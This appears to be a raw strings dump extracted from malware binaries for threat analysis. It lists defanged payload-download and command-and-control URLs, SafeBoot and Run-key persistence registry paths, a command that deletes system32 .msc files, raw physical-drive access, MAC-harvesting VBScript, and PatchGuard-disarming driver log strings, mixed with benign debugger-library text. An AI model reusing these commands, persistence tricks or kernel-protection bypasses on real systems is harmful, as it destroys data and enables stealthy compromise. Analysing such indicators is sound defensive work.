SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E969-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96A-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96B-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96F-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E973-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E975-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E977-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97B-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97D-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E980-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{71A27CDD-812A-11D0-BEC7-08002BE2092F}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmboot.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmio.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmload.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ip6fw.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ipnat.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpcdd.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpdd.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpwd.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sermouse.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sr.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Tcpip\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdpipe.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdtcp.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vga.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vgasave.sys\
del /f /s /q /a %SystemRoot%\system32\*.msc
Software\Microsoft\Windows\CurrentVersion\Run\Explore.exe
\system32\reg.bat
\system32\reg.reg
regedit /s reg.reg
assoc .exe=exefile
.reg\
.exe\
\\.\\physicaldrive0Session Manager
\qfx64.sys
hXXp://VVV.yy171.com/x64.jpg
\qfx86.sys
hXXp://VVV.yy171.com/x86.jpg
DrvAnti.exe
hXXp://qxw1001940641.my3w.com/b/user.asp\
@\\.\
,Step &into,Step &over,Animate into,Animate over,Execute till return,Debugging &options,&Just-in-time debugging,Select A&PI help file,SEH chain,Call stac&k,&Breakpoints,Ru&n trace,
(&S),&Attach,VEH/SEH chain,INT3 &breakpoints,Call DLL export Alt F6,Run thread F11,Set condition... Ctrl T,&Options... Alt O,Stop hit trace,Run hit trace,Execute till return Ctrl F9
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
\xodriver.dll
.text
h.rdata
H.data
.pdata
.vmp0
.vmp1
.reloc
.di1zg
hal.dll
kp".JZR
ntoskrnl.exe
N=(xdzVD0.ZR
c:\users\chandler\desktop\jinshu\20151029-src\xodriver\objfre_win7_amd64\amd64\XODriverWin7AMD64.pdb
2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,
/hXXp://csc3-2010-crl.verisign.com/CSC3-2010.crl0D
hXXps://VVV.verisign.com/rpa0
hXXp://ocsp.verisign.com0;
/hXXp://csc3-2010-aia.verisign.com/CSC3-2010.cer0
<VeriSign Class 3 Public Primary Certification Authority - G50
DhXXp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0
hXXps://VVV.verisign.com/cps0*
#hXXp://logo.verisign.com/vslogo.gif04
#hXXp://crl.verisign.com/pca3-g5.crl04
hXXp://ocsp.verisign.com0
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "hXXp://VVV.w3.org/TR/html4/strict.dtd">
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=GB2312">
<a href="javascript:history.back(1)">
<h2>HTTP
<a href="hXXp://go.microsoft.com/fwlink/?linkid=8180">Microsoft
“HTTP”
c:\users\chandler\desktop\jinshu\20151029-src\xodriver\cmddispatch.c
count is %d
\SystemRoot\system32\%s
c:\users\chandler\desktop\jinshu\20151029-src\xodriver\driverentry.c
system not support.
Warning: OnDeviceControl unknown DeviceObject: X.
c:\users\chandler\desktop\jinshu\20151029-src\xodriver\objfre_wxp_x86\i386\XODriverWinXPx86.pdb
h.zlB
Qntoskrnl.exe
c:\jqm.ini
Set mc=GetObject("Winmgmts:").InstancesOf("Win32_NetworkAdapterConfiguration")
If mo.IPEnabled=True Then
MACAddress= mo.MacAddress
wshom.ocx
WindowStyle
Hotkey
hXXp://VVV.yxbsq.com
hXXp://VVV.yxbsq.com/show.asp?id=63
hXXp://baidu.com
WinHttp.WinHttpRequest.5.1
/123.123
.oTr~
/%x(Y
wntdll.dll
gdi32.dll
ws2_32.dll
Windows 10
SOFTWARE\Microsoft\Windows NT\CurrentVersion\CurrentVersion
SOFTWARE\Microsoft\Windows NT\CurrentVersion\CSDVersion
Windows 8.1
Windows 8
Windows Server 2012
Windows 7
Windows Server 2008 R2
Windows Vista
Windows Server 2008
Windows XP
Windows Server 2003
Windows Server 2003 R2
Windows 2000
Windows NT 4.0
Windows 95
Windows 98
Windows Me
Web Edition
SOFTWARE\Microsoft\Windows NT\CurrentVersion\EditionID
SOFTWARE\Microsoft\Windows NT\CurrentVersion\CurrentBuild
hXXp://VVV.yxbsq.com/show.asp?id=66
00000001
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AlwaysUnloadDLL
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRemoteRecursiveEvents
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSaveSettings
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\NoNetCrawling
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RemoteComputer\NameSpace\{2227A280-3AEA-1069-A2DE-08002B30309D}\
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RemoteComputer\NameSpace\
DLLHOST.EXE,MMC.EXE,RUNDLL32.EXE
4294967197
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SFCDisable
SYSTEM\ControlSet002\Control\Windows\NoPopUpsOnBoot
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\legalnoticecaption
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\legalnoticetext
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoAdminLogon
Software\Microsoft\Windows\CurrentVersion\Explorer\CabinetState\Use Search Asst
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\DisableThumbnailCache
SOFTWARE\Policies\Microsoft\Windows\DriverSearching\DontSearchWindowsUpdate
Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\CleanupWiz\NoRun
Software\Microsoft\Office\11.0\Common\DWNoExternalURL
SOFTWARE\Policies\Microsoft\WindowsMediaPlayer\DisableAutoUpdate
SOFTWARE\Microsoft\PCHealth\ErrorReporting\AllOrNone
SOFTWARE\Microsoft\PCHealth\ErrorReporting\IncludeKernelFaults
SOFTWARE\Microsoft\PCHealth\ErrorReporting\IncludeMicrosoftApps
SOFTWARE\Microsoft\PCHealth\ErrorReporting\IncludeWindowsApps
SOFTWARE\Microsoft\PCHealth\ErrorReporting\DoReport
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun
hXXp://VVV.yxbsq.com/list.asp?classid=6
\yxbs.dll
taskmgr.exe
\yx.dll
`.text
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><ms_windowsSettings:dpiAware xmlns:ms_windowsSettings="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings" xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</ms_windowsSettings:dpiAware></windowsSettings></application></assembly>
{.kx&da
pLp3p2p.oD
"#$%&'()
* ,-./01
23456789
EM32'bs k.DL
.dli$
.tex8
h.rdat
HAL.dl
%fYPn
.LL9z
1@90%sw
W)_U.GG
0123456
'?(?)?*3 !,
&='>(?)1*
[9@\:] ^
=YS[D.gxE="?"
Ou%%C
;^.djt
".DBV
&'()* ,-
./012345
6789:;<=
ult .arg
"Ñ8
~ ~!~"~#
33%XD'
.QHK/
pp2p.oD
i.yCb
t.GSoK
*X.Ehm
/A#.Yg \
0$%UTu/"4
%d"U0
'()* ,-.
/0123456
789:;<=>
T.Pt7
"G%SEwj<
'pa"%C
?#%X.2y
-(Q%Dn3
@%h%XC
(p?%u%
@cmd.0extCOM'SPc
Y.nPF
.qi8p
@$.SW2;'~
!%UgFXU
='T%C~9w"
4]rP
d.DL2
U~R%s
=#-a}
L<%u_
gouR.nJ
4_.yT
.HB1!
^Ñ!
u(v%DV
q 0%X
?#%X.y
z(J.vb
JL?P%sx
L32.dl;
bEXer
= >$?(?,?0'4
 :1%S
Tp.Ed
.MPRES
#@d%S
_.NK|
,.RpY
.erAC
&.Fso
p.BRJ?
p>%U,
msvcrt
m!.oQ
biansu.dll
g.ke(
r32.dl
X(.vO
Windows 10 Professional
\\.\DenyLoadDriver
\DenyLoadDriver.dll
c:\users\hwl\desktop\20160430\bin\amd64\DenyLoadDriver.pdb
.sedata
.idata
w.Ewo[
&&&&6666????
""""****
2222::::
$$$$\\\\
00006666
####====
SESDKDummy64.dll
.rm|O
lŸD
%s*xl
?.hi$
jh%U@
K:\UW
H:NJ.NC
I&k%d$
.Nxup
#%dYd
T".fA
rmsGrEM
y.uQLfZ
exú
DuDp
fe|P.nT
%Xx]e
gb.ho
.Mrda
.qpsjA
}.Ia7
KeYTn
(*.AXN
D .fD
.RSDS
f:\programming\my\sell\2016-03-19\sys\objfre_win7_amd64\amd64\lonerSpeed_v40.pdb
KeDelayExecutionThread
Safengine Shielden v2.3.7.0
t$.fA
hXXp://ts-ocsp.ws.symantec.com07
 hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0
 hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0
Thawte Certification1
hXXp://ocsp.thawte.com0
.hXXp://crl.thawte.com/ThawteTimestampingCA.crl0
.Shanghai Bo Yi Information Technology Co. Ltd.1:08
shielden_user@safengine.com1
shielden_user@safengine.com0]
LhXXp://pki-crl.symauth.com/ca_3e5451d77b370c64c3bd39d10f35bd21/LatestCRL.crl07
hXXp://pki-ocsp.symauth.com0
51153809
ehXXp://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.crl0
.rdata
.data
szIN: %s
password right!
password wrong!
uUt%S
.vp;q;I
$%Xb:
` .fD
&.Uox
.cn>:
.Zld!0
h.yY:
N3M%U
, J.pX
].Kdq
:.vkP<
.kFlb
tjb.vkP
.ZFZ?
5J.me
Dj.Mc
?.GpfpO8
f:\programming\my\sell\2015-10-19\sys\objfre_win7_amd64\amd64\lonerSpeed_v40.pdb
Dntoskrnl.exe
HAL.dll
D$ý
rmntoskrnl.exe
\win8pg.exe
`.rdata
@.data
@.rsrc
@.reloc
GetProcessWindowStation
imagehlp.dll
CreatePipe
KERNEL32.dll
USER32.dll
SHELL32.dll
GetProcessHeap
GetCPInfo
zcÁ
<requestedExecutionLevel level='requireAdministrator' uiAccess='false' />
hXXp://VVV.yxbsq.com/show.asp?id=54
passkpp
\passkpp.dll
B.rsrc
AESKEYGENASSIST
VAESKEYGENASSIST
d:\igs\driver\x64hook\x64pass\x64\amd64\x64pass.pdb
##%%&'%#&'&'
% & ' ( ) *  
, - . / 0 1 2
3 4 5 6 7 8 9
-!.!/!0!8
" "!"""#"$"%"&"'"(")"*" ","-"
/"0"1"2"
# #!#"###$#%#
&#'#(#)#*# #,#-#
.#/#0#1#2#3#4#
5#6#7#8#9#:#
;#<#=#>#?#
#8@9@:@;@
#[@\@]@^@
m'D:.Gu6
zBS%d
\Fixblue.sys
%f)prA%H
V-T}0
MH$T2%U
.ayU(
wt%s}
.qKWPE
.ZB))DyqY
.G.Dr
M.GO[
>j`.nu
s WluDp
Z.Yn{K
z-4b}
hid.dll
iphlpapi.dll
mscoree.dll
mscorwks.dll
mscorsvr.dll
KernelBase.dll
mscoreei.dll
clr.dll
diasymreader.dll
SEGetNumExecUsed
SEGetNumExecLeft
SESetNumExecUsed
SEGetExecTimeUsed
SEGetExecTimeLeft
SESetExecTime
SEGetTotalExecTimeUsed
SEGetTotalExecTimeLeft
SESetTotalExecTime
SECheckExecTime
SECheckTotalExecTime
IPHLPAPI.DLL
msvcrt.dll
_amsg_exit
PSAPI.DLL
RegOpenKeyExA
RegCloseKey
RegCreateKeyExA
RegDeleteKeyA
ADVAPI32.dll
%X#l]L
x.yj(
}y%x#K
lßD
-Dv}l
%uAZ-
i*.nP5
AF.nk
.cD):S
a`4%c
%cJ*#
%cWqL&
).cu?v\
7*%c^
.qpsj
%UZP-
Kz%Dx
ZudP
%xS&NQy
Tk.EPx
|'ý
'{.qAZ<
T"ý
U.CxU
kV.Br\
-Q9};T*
<%S&4
>,%s9
[I.Ty
.fs v
{r#.Utt
BYd{.VQhSj
K.vQt
udp}q{f
$c.%X
%CX4A9
'%sZ(
).nl&~
#.vQD[f`#
C8$.uc
}%Ush
F}.yp
\s.VAi
%Ch:4
=T7_J%X
%X3nI
O.aPJ
%1U=Q
k.EPx
\s.EP
{.vQ|
[5.Be
c.BMF=@A
Z%.Ba
.lG8h
y|g%C
>rDF%Dwc
Vi-N}
PX IV%C;e=
g.eUh
F%c{M-&
;,.fEN
=I.GM
C:\Users\Administrator\Desktop\FixBlue
\DisPG\x64\Release\Fixblue.pdb
)KERNEL32.dll
%FormatMessageW
d$ú
%Sleep
?PSAPI.DLL
RegCreateKeyExW
SHLWAPI.dll
SHDeleteKeyW
SHELL32.dll
 BKERNEL32.dll
[%4x:%4x] Initialize : Starting DisPG.
[%4x:%4x] Initialize : PatchGuard has been disarmed.
[%4x:%4x] PatchGuard %p : KiScbQueueScanWorker (%p) was dequeued.
[%4x:%4x] PatchGuard %p : FsRtlUninitializeSmallMcb (%p) was dequeued.
[%4x:%4x] PatchGuard %p : Pg_IndependentContextWorkItemRoutine was called.
[%4x:%4x] PatchGuard ???????????????? : KeDelayExecutionThread is returning to Pg_SelfEncryptWaitAndDecrypt (%p).
[%4x:%4x] PatchGuard ???????????????? : KeDelayExecutionThread is returning to FsRtlMdlReadCompleteDevEx (%p).
[%4x:%4x] PatchGuard ???????????????? : KeWaitForSingleObject is returning to FsRtlMdlReadCompleteDevEx (%p).
[%4x:%4x] PatchGuard %p : XorKey %p
C:\Users\Jank\Desktop\PgResarch-master\DisPG\x64\Release\DisPG.pdb
ZwQueryValueKey
ZwOpenKey
KeStallExecutionProcessor
HAL.DLL
 hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0<
 hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
\symsrv.sys
`.data
@.idata
Invalid parameter passed to C runtime function.
LZ32.dll
Cabinet.dll
WININET.dll
WINHTTP.dll
GDI32.dll
sdktools\debuggers\symsrv\symsrv.cpp
sdktools\debuggers\symsrv\common.cpp
Assertion at %s, line %d.
HttpOpenRequestW
HttpQueryInfoW
HttpSendRequestW
WinHttpOpen
WinHttpCloseHandle
WinHttpReadData
WinHttpSendRequest
WinHttpQueryOption
lz32.dll
winhttp.dll
cabinet.dll
sdktools\debuggers\symsrv\store.hpp
sdktools\debuggers\symsrv\store.cpp
sdktools\debuggers\symsrv\ini.cpp
MICROSOFT DEBUGGING SYMBOLS AND EXECUTABLES
support services
INSTALLATION AND USE RIGHTS. You may install and use any number of copies of the software on your devices for the purpose of debugging a validly licensed copy of Microsoft operating system software, or one or more applications running on a validly licensed copy of a Microsoft operating system.
2. SCOPE OF LICENSE. The software is licensed, not sold. This agreement only gives you some rights to use the software. Microsoft reserves all other rights. Unless applicable law gives you more rights despite this limitation, you may use the software only as expressly permitted in this agreement. In doing so, you must comply with any technical limitations in the software that only allow you to use it in certain ways. You may not
6. EXPORT RESTRICTIONS. The software is subject to United States export laws and regulations. You must comply with all domestic and international export laws and regulations that apply to the software. These laws include restrictions on destinations, end users and end use. For additional information, see VVV.microsoft.com/exporting.
7. SUPPORT SERVICES. Because this software is
we may not provide support services for it.
8. ENTIRE AGREEMENT. This agreement, and the terms for supplements, updates, Internet-based services and support services that you use, are the entire agreement for the software and support services.
10. LEGAL EFFECT. This agreement describes certain legal rights. You may have other rights under the laws of your country. You may also have rights with respect to the party from whom you acquired the software. This agreement does not change your rights under the laws of your country if the laws of your country do not permit it to do so.
bec, Canada, certaines des clauses dans ce contrat sont fournies ci-dessous en fran
crit certains droits juridiques. Vous pourriez avoir d
6.3.9600.16384
symsrv.pdb
tý9
InternetCrackUrlW
HttpAddRequestHeadersW
WinHttpReceiveResponse
WinHttpSetOption
WinHttpConnect
WinHttpQueryHeaders
WinHttpGetDefaultProxyConfiguration
WinHttpQueryDataAvailable
WinHttpOpenRequest
SYMSRV.DLL
httpCloseHandle
httpOpenFileHandle
httpOpenFileHandleW
httpQueryDataAvailable
httpReadFile
RegOpenKeyExW
WS2_32.dll
ChXXp://crl.microsoft.com/pki/crl/products/MicrosoftTimeStampPCA.crl0X
<hXXp://VVV.microsoft.com/pki/certs/MicrosoftTimeStampPCA.crt0
*31595 4faf0b71-ad37-4aa3-a671-76bc052344ad0
EhXXp://crl.microsoft.com/pki/crl/products/MicCodSigPCA_08-31-2010.crl0Z
>hXXp://VVV.microsoft.com/pki/certs/MicCodSigPCA_08-31-2010.crt0
$Microsoft Root Certificate Authority0
?hXXp://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl0T
8hXXp://VVV.microsoft.com/pki/certs/MicrosoftRootCert.crt0
$Microsoft Root Certificate Authority
.tq[m
hXXp://VVV.microsoft.com/windows0
EhXXp://crl.microsoft.com/pki/crl/products/MicCodSigPCA_2010-07-06.crl0Z
>hXXp://VVV.microsoft.com/pki/certs/MicCodSigPCA_2010-07-06.crt0
)Microsoft Root Certificate Authority 20100
EhXXp://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl0Z
>hXXp://VVV.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt0
1hXXp://VVV.microsoft.com/PKI/docs/CPS/default.htm0@
EhXXp://crl.microsoft.com/pki/crl/products/MicTimStaPCA_2010-07-01.crl0Z
>hXXp://VVV.microsoft.com/pki/certs/MicTimStaPCA_2010-07-01.crt0
\dbghelp.sys
Module %d
11.00.65501.17017
S_EXPORT
LF_VFTPATH
LF_VFTPATH_16t
'%s'!'%s'
.Base
@ILT %d(
RPCRT4.dll
EXPORT
Stack debugging mask is 0xx, output via %s
VC7 FPO - %sabled
LOP frame unwind - %sabled, symbol info %sabled, return search %sabled
Force LOP frame unwind - %sabled
Added force-ebp region %I64x:%x
Unable to add force-ebp region %I64x:%x
x`x
Couldn't find process 0x%x
%d loaded modules...
0x%s -
Loaded Module Info: [%s]
Couldn't find process 0x%x while looking for %s
%s not found
Load Report: %s
%s - ignored because unknown file extension.
%s - ignored. The input name/address could not be resolved to a loaded module.
X-X-X-XX-XXXXXX
Timestamp: %X
SizeOfImage: %X
dbg: %s
pdb: %s
pdb sig: %X
pdb sig: %s
age: %X
Couldn't load %s
Loaded pdb is %s
Unknown error, HRESULT is %x
MATCH: %s and %s
MISMATCH: %s and %s
age MISMATCH: %s and %s
sig MISMATCH: %s and %s
%s <module> [symbol]
%s tests the validity of a module against a symbol file.
Inline debugging mask is 0xX
Could not find module %s
Omap Block: [%s]
error 0x%x looking for block
Dump OMAP: [%s]
%8x <-%8x
0x%I64x: %8x ->%8x
Home directory is %s
error 0x%x setting home directory to %s
%s!%s
Source Files: [%s]
%c%c%c%c -
Sig: %lx, Age: %lx,%sPdb: %s
GUID: {X-X-X-XX-XXXXXX}
Age: %lx, Pdb: %s
Module: %s
Base Address: %p%s
Image Name: %s
Machine Type: %d
Size: %x
Characteristics: %lx %s %s
- Image read successfully from %s.
from %s.
Compiler: %s - front end [%d.%d bld %d] - back end [%d.%d bld %d]
Windows GUI
Windows CUI
Windows Boot Application
Export
Import
Bound Import
Import Address Table
Delay Import
Can't read file header: error == %d
File Type: EXECUTABLE IMAGE
%8hX machine (%s)
%u.u
%8s linker version
%8hX subsystem (%s)
%8s operating system version
%8s image version
%8s subsystem version
High entropy VA supported
AppContainer executable
%8lX [%8lX] address [size] of %s Directory
%8lX %s
%8x %8x %8x
Image Name: %s
Format: NB10, %x, %x, %s
Format: RSDS, guid, %x, %s
Format: UNKNOWN - sig = 0x%x
Debug Directories(%d)
%*s : %s [0x%I64X to 0x%I64X) (len 0x%-3X): [- others]: [0x%-3X offset][%x,%s,%s,%x,%x]
Error: Couldn't find process 0x%x
Current RVA: 0x%x
Inline: (%S,%I64x,%x,%I64x)
Symbol: (%S,%I64x,%x,%I64x)
%s - %S
SrcSrvExecTokenW
closing session: %s
Creating FPO for x from DIA
[_:][_:]
Invalid SWD_DECODE.SegSize %d
processed a user callback, args %u
processed an exception dispatch, ret %x
call search %x to %x for call to %x
%x: potential call ret-addr %x, scan %x:%x
direct call %x: %s
stack %x, found direct call %x to %x
indirect call %x: %s
stack %x, found indirect call %x to %x
unk indirect call %x
stack %x, guessing likely direct call
stack %x, guessing likely indirect call
stack %x, guessing likely unk indirect call
stack %x, guessing direct call
stack %x, guessing indirect call
stack %x, guessing unk indirect call
accum failed, %s
accum frame: ebp %d, eip %d, esp %d, frame %d, unk %d, fp %d, uebp %d
WriteAtOffset.Seek(0x%x) failed, 0xx
WriteAtOffset.Write(0x%x) failed, 0xx
WriteMemoryFromProcess.Read(0x%I64x, 0x%x) failed, 0xx
WriteStringToPool.Write(0x%x) failed, 0xx
WriteFunctionTableList.Seek(0x%x) failed, 0xx
WriteFunctionTableList.DumpTable.Write(0x%x) failed, 0xx
WriteFunctionTable.RawTable.Write(0x%x) failed, 0xx
WriteFunctionTable.RawEntries.Write(0x%x) failed, 0xx
WriteTokenInformation.Write(0x%x,%d,%d) failed, 0xx
WriteTokenInformation.ProcessToken(%d,%d) failed, 0xx
WriteTokenInformation.ThreadToken(%d,%d) failed, 0xx
WriteTokenInformation.Write(%d,%d)(%d,%d) error.
WriteDirectoryEntry.Write(0x%x) failed, 0xx
Thread(0x%x) callback returned FALSE
WriteSystemInfo.GetCpuInfo failed, 0xx
WriteSystemInfo.GetOsCsdString failed, 0xx
CalculateSizeForSystemInfo.GetOsCsdString failed, 0xx
WriteHeader.GetCurrentTimeDate failed, 0xx
WriteDirectoryTable.Seek(0x%x) failed, 0xx
WriteMemoryInfo.QueryVirtual(0x%I64x) failed, 0xx
WriteMemoryInfo.Write(0x%x) failed, 0xx
WriteFullMemory.QueryVirtual(0x%I64x) for info failed, 0xx
WriteFullMemory.Desc.Write(0x%x) failed, 0xx
WriteFullMemory.QueryVirtual(0x%I64x) for data failed, 0xx
WriteFullMemory.Memory.Read(0x%I64x, 0x%x) failed 0xx, skip.
WriteFullMemory.Memory.Read(0x%I64x, 0x%x) failed 0xx, ABORT.
WriteFullMemory.Memory.Write(0x%x) failed, 0xx
WriteFullMemory virtual memory layout changed, retries %d, 0x%I64x (0x%I64x:0x%I64x) vs. 0x%I64x (0x%I64x:0x%I64x)
Kernel minidump write failed, 0xx
MarshalExceptionPointers.ExRecord.Read(0x%I64x, 0x%x) failed, 0xx
MarshalExceptionPointers.CxRecord.Read(0x%I64x, 0x%x) failed, 0xx
Invalid exception record size (0x%x)
Invalid context size (0x%x)
Invalid exception record parameter count (0x%x)
GetSystemType.GetCpuType failed, 0xx
GetSystemType.GetOsInfo failed, 0xx
Invalid pointer size (0x%x)
Invalid page size (0x%x)
Invalid function table size (0x%x)
Invalid function table entry size (0x%x)
Invalid instruction window size (0x%x)
Invalid CPU type (0x%x)
Invalid dump type 0x%x
Dump type requires streaming but output provider does not support streaming
Write.Start failed, 0xx
y\Alloc(0x%x) failed
Realloc(0x%x) failed
Thread(0x%x) will not be included
Memory read failure at %I64x:%x ignored by callback
GenGetImageSections.Read(0x%I64x, 0x%x) failed, 0xx
GenGetImageSections.GenImageNtHeader(0x%I64x) failed
GenGetImageSections.Section.Read(0x%I64x, 0x%x) failed, 0xx
GenAllocateThreadObject.Open(0x%x) failed, 0xx
GenAllocateThreadObject.GetContext(0x%x) failed, 0xx
GenAllocateThreadObject.GetTebInfo(0x%x) failed, 0xx
ThreadToken(%d,%I64x,%d,%d)
ThreadToken_SessionId(0xX,%d,%d,%d)
ThreadToken_User(0xX,%d,%d,%d)
ThreadToken_Group(0xX,%d,%d,%d)
ThreadToken_PrimaryGroup(0xX,%d,%d,%d)
ThreadToken_Privileges(0xX,%d,%d,%d)
ThreadToken_Statistics(0xX,%d,%d,%d)
ThreadToken_RestrictedSids(0xX,%d,%d,%d)
GenReadTlsDirectory.Read(0x%I64x, %ws) failed, 0xx
GenReadTlsDirectory(0x%I64x, %ws) unknown machine 0x%x
GenReadTlsDirectory.Index(0x%I64x, %ws) failed, 0xx
GenAllocateModuleObject.GetVersion(0x%I64x, %ws) failed, 0xx
GenAllocateModuleObject.GetImageHeaderInfo(0x%I64x, %ws) failed, 0xx
GenAllocateModuleObject.GenImageNtHeader(0x%I64x, %ws) failed, 0xx
Unable to add module "%ws" PE header, (0xX,0x%I64x)(%x,%x)
Unable to add directory %x from module "%ws", (%x,%x,%x)
Unable to add debug directory %x from module "%ws", (%x,%x,%x,%x)
GenAllocateModuleObject.GenDebugRecord(0x%I64x, %ws) failed, 0xx
GenAllocateProcessObject.GetPeb(0x%x) failed, 0xx
GenAllocateProcessObject.GetCpuPowerInfo() failed, 0xx
ProcessToken(%d,%I64x,%d,%d)
ProcessToken_SessionId(0xX,%d,%d,%d)
ProcessToken_User(0xX,%d,%d,%d)
ProcessToken_Groups(0xX,%d,%d,%d)
ProcessToken_PrimaryGroup(0xX,%d,%d,%d)
ProcessToken_Privileges(0xX,%d,%d,%d)
ProcessToken_Statistics(0xX,%d,%d,%d)
ProcessToken_RestrictedSids(0xX,%d,%d,%d)
GenIncludeUnwindInfoMemory.Enum(0x%I64x, 0x%x) failed, 0xx
GenGenTebMemory.TLS(0x%I64x) failed, 0xx
GenScanAddressSpace.QueryVirtual(0x%I64x) failed, 0xx
GenGetAuxMemory(%ws) failed, 0xx
GenInvokeEnumStackProviders(%ws) failed, 0xx
GenGetHandleData.Start(0x%x) failed, 0xx
GenGetProcessInfo.Start(0x%x) failed, 0xx
GenGetProcessInfo.EnumThreads(0x%x) looped
GenGetProcessInfo.EnumThreads(0x%x) failed, 0xx
GenGetProcessInfo.EnumModules(0x%x) looped
GenGetProcessInfo.EnumModules(0x%x) failed, 0xx
GenGetProcessInfo.EnumUnloadedModules(0x%x) looped
GenGetProcessInfo.EnumUnloadedModules(0x%x) failed, 0xx
GenGetProcessInfo.EnumFunctionTables(0x%x) looped
GenGetProcessInfo.EnumFunctionTables(0x%x) failed, 0xx
GenGetProcessInfo.EnumFunctionTableEntries(0x%I64x, 0x%x) failed, 0xx
GenWriteHandleData.Seek(0x%x) failed, 0xx
GenWriteHandleData.TypeNameLen.Write(0x%x) failed, 0xx
GenWriteHandleData.TypeName.Write(0x%x) failed, 0xx
GenWriteHandleData.ObjectNameLen.Write(0x%x) failed, 0xx
GenWriteHandleData.ObjectName.Write(0x%x) failed, 0xx
GenWriteHandleData.InfoHdr.Write(0x%I64x) failed, 0xx
GenWriteHandleData.Info.Write(0x%I64x) failed, 0xx
GenWriteHandleData.Header.Write(0x%x) failed, 0xx
GenWriteHandleData.Desc.Write(0x%x) failed, 0xx
GenWriteHandleOperations stream RVA overflow
GenWriteHandleOperations.Seek(0x%x) failed, 0xx
GenWriteHandleOperations.List.Write(0x%x) failed, 0xx
GenWriteHandleOperations.Ops.Write(0x%x) failed, 0xx
Software\Microsoft\Windows NT\CurrentVersion\KnownFunctionTableDlls
kernelbase.dll
api-ms-win-core-toolhelp-l1-1-0.dll
api-ms-win-core-kernel32-private-l1-1-0.dll
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls
Software\Microsoft\Windows NT\CurrentVersion\KnownManagedDebuggingDlls
powrprof.dll
verifier.dll
psapi.dll
api-ms-win-core-psapi-obsolete-l1-1-0.dll
version.dll
Unable to get basic symbol unwind info at %I64X:%X
Got unwind info length %X from symbols
Insufficient unwind info in symbols for %I64X:%X
Dbh-%s in: PC %8X, SP %8X, FP %8X, RA %8X
Dbh-%s in: PC %I64X, SP %I64X, FP %I64X, RA %I64X
